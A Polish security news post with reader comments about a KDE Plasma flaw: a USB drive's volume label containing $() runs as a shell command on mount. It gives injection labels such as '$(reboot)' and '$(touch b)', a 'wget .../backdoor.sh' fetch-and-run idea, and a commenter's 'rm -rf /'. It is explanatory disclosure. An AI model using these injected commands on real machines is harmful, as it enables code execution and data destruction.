Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
Nazwij pendrajwa $(reboot) – po umieszczeniu w porcie zrebootuje system
albo wykona dowolne inne polecenie umieszczone w $() – a wszystko w KDE, czy dokładniej: w środowisku KDE Plasma:
When a vfat thumbdrive which contains „ or $() in its volume label is plugged and mounted trough the device notifier, it’s interpreted as a shell command, leaving a possibility of arbitrary commands execution. an example of offending volume label is „$(touch b)” which will create a file called b in the home folder.
Jak widać działa też opcja z „, a podatność została co dopiero załatana w wersjach 5.12.0 / 5.8.9
Czy reboot z tytułowego przykładu zadziała zawsze? Może to zależeć to od użytkownika, który umieści pendrive w porcie – choć maksymalny (czyli High) wpływ na integralność, dostępność i poufność systemu – oszacowany przez RedHata – nie wygląda optymistycznie… Można oczywiście kombinować inaczej – np. pobrać dowolny kod tak `wget sekurak.pl/backdoor.sh` i go następnie uruchomić.
–ms
A to nie jest tak, że label może mieć długość maksymalnie 11 znaków?
Mam na myśli, że te kombinacje z backdoorem nie zadziałają
może, ale coś w 11 znakach dałoby się jednak zrobić? Jakieś pomysły?
Można 'pisać’ do pliku podmieniając pendrivy
’rm -rf /’ , pozdrawiam
Czyli problem mają tylko te osoby, które korzystają ze starych wersji KDE.Bo i LTS i najnowsza (też LTS zresztą) są już załatane.
Wyjścia są dwa: albo przestanę czytać takie wortale, albo przestanę włączać komputer- choć życie w błogiej nieświadomości może się skończyć fatalnie :)